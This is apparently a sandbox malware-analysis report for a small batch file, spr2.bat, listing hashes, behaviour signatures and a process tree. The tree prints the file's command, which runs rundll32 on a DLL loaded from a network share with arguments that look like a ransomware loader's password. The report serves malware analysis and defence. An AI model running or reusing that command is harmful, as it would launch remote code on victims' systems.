a7fe915517ec1fff09e9b59be27d2ab81c3bbb018c80583ea7ac94ce9185472a | Triage

Analysis

max time kernel
70s
max time network
68s
platform
windows7_x64
resource
win7v20201028
submitted
04-11-2020 18:15

Sharing

Report Analysis Logs

General

Target

spr2.bat
Size

99B
MD5

103653f5e19bc6d0e1fe3f9d22d15aca
SHA1

0c609be88e6ae892968066a078e624dfe1fbc798
SHA256

81c7ae979acbec699f975e928b68c3bbfc04fec8bdcac2d42c8f7e16c25eb137
SHA512

09562fc765a8c4fd8f25bbbe5f9e6ef2ce2e749f6900dc5c50e90ced794d57feb9102e0bcb5374c1e9034f25cbe920052b96d8ed942ee0098a7be10cfe40085b

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 996 wrote to memory of 452	996	cmd.exe	26
PID 996 wrote to memory of 452	996	cmd.exe	26
PID 996 wrote to memory of 452	996	cmd.exe	26

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\spr2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:996
- C:\Windows\system32\rundll32.exe
  rundll32.exe "\\SRV01QW\sp\b.dll",DllRegisterServer --passegregor10 --append="carraro" --multiproc
  2⤵
  PID:452

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads